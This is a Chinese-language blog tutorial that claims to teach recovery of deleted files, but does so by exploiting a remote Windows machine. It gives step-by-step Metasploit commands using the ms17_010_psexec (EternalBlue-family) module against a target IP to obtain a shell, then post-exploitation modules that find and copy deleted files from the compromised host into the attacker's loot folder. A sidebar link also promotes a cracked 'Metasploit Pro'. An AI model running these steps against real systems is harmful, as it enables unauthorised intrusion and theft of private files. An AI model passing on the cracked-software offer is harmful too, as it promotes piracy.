黑客是如何恢复任意删除的文件?回收站清空的也可以!

作者:FancyPig | 发布时间: | 更新时间:

相关阅读

数据恢复

data-postsbox="{"id":16463,"title":"宝塔误删数据库如何恢复?一次恢复mysql数据的实践","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3382,"comment_count":3,"category":"project","is_forum_post":false}">{"id":16463,"title":"宝塔误删数据库如何恢复?一次恢复mysql数据的实践","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3382,"comment_count":3,"category":"project","is_forum_post":false}
data-postsbox="{"id":10253,"title":"图片马赛克可以恢复?福尔摩🐷教您去除图片的马赛克","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":10650,"comment_count":147,"category":"knowledge","is_forum_post":false}">{"id":10253,"title":"图片马赛克可以恢复?福尔摩🐷教您去除图片的马赛克","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":10650,"comment_count":147,"category":"knowledge","is_forum_post":false}

取证相关

data-postsbox="{"id":19286,"title":"微信聊天记录取证工具","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/07/20220704082301397.png","cover_video":"","views":14873,"comment_count":23,"category":"knowledge","is_forum_post":false}">{"id":19286,"title":"微信聊天记录取证工具","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/07/20220704082301397.png","cover_video":"","views":14873,"comment_count":23,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":15969,"title":"给你一台电脑,你能提取微信的信息吗?","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/05/20220516092713172.jpg","cover_video":"","views":9282,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":15969,"title":"给你一台电脑,你能提取微信的信息吗?","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/05/20220516092713172.jpg","cover_video":"","views":9282,"comment_count":18,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":14893,"title":"服务器勘验、电子数据取证的一些实用技巧","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4261,"comment_count":6,"category":"knowledge","is_forum_post":false}">{"id":14893,"title":"服务器勘验、电子数据取证的一些实用技巧","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4261,"comment_count":6,"category":"knowledge","is_forum_post":false}

Kali linux

data-postsbox="{"id":2210,"title":"Kali linux最新版 安装方法以及常见问题解答","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6747,"comment_count":28,"category":"cybersecurity","is_forum_post":false}">{"id":2210,"title":"Kali linux最新版 安装方法以及常见问题解答","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6747,"comment_count":28,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":9415,"title":"Kali linux最新版镜像如何下载","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5353,"comment_count":4,"category":"cybersecurity","is_forum_post":false}">{"id":9415,"title":"Kali linux最新版镜像如何下载","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5353,"comment_count":4,"category":"cybersecurity","is_forum_post":false}

Metasploit

Kali linux本身就自带,如果你觉得还不满足可以尝试Pro

data-postsbox="{"id":5955,"title":"Metasploit Pro 2022 最新专业激活版/破解版 价值15000$","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":18044,"comment_count":1115,"category":"software","is_forum_post":false}">{"id":5955,"title":"Metasploit Pro 2022 最新专业激活版/破解版 价值15000$","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":18044,"comment_count":1115,"category":"software","is_forum_post":false}

视频讲解

你是否会遇到不小心删除了文件,同时清空了回收站?本期视频带你一起看看,黑客在入侵后是如何对删除文件进行恢复、并完成取证的,如何通过metasploit框架恢复电脑磁盘里删除过的文件!

备用播放线路

图文讲解

接管目标计算机

启动Metasploit渗透测试框架

sudo msfconsole

搜索eternal模块

search eternal

使用编号1的模块exploit/windows/smb/ms17_010_psexec

use 1

然后设置目标服务器的IP地址

set RHOSTS 192.168.0.186

然后运行

exploit

这里显示已经接管了目标机器

您可以输入下面的命令接管windows电脑的cmd终端

shell

输入下面的命令可以退出进行我们的后续操作

exit

我们继续输入下面的命令,让会话在后台运行

background

数据恢复与取证

接下来是我们每个人最关注的,如何恢复我们删除的文件?

我们将使用post/windows/gather/forensics/enum_drives模块

use post/windows/gather/forensics/enum_drives

然后我们刚才在后台运行的会话是SESSION 1,因此我们需要设置该模块针对的会话是SESSION 1

set SESSION 1

然后运行

run

这里我们可以看到驱动盘

我们这里可以直接下一步,开始恢复E盘的数据,使用post/windows/gather/forensics/recovery_files模块

use post/windows/gather/forensics/recovery_files

然后设置磁盘为E盘,因为我们一开始是在E盘删除的文件

set DRIVE E:

然后设置会话为SESSION 1

set SESSION 1

然后运行该模块

run

我们发现这里已经找到了两个被回收站删掉的文件

我们这里尝试进行恢复

set FILES 356909056,356910080

上面设置的文件要填写刚才我们找到的文件ID编号

然后运行

run

我们可以看到文件已经恢复到了/root/.msf4/loot目录下

我们进入对应的路径

cd /root/.msf4/loot

使用cat命令查看其中的文件,发现和删除的简直一模一样,到这里恢复数据、进行取证就结束了!

希望今天的教程你能学到很多😊

标签:黑客, 数据恢复, 文件恢复, 文件恢复工具, 文件恢复软件, 文件恢复软件免费版下载, 文件恢复软件哪个最好用, 文件恢复大师, 文件恢复怎么弄, 数据恢复软件免费版, 数据恢复精灵, 数据恢复大师, 数据恢复公司, 黑客恢复数据微信, 黑客恢复数据, 恢复回收站删除的文件, 恢复回收站已删除东西, 恢复回收站清空内容, 如何恢复回收站删除的照片, 电脑怎么恢复回收站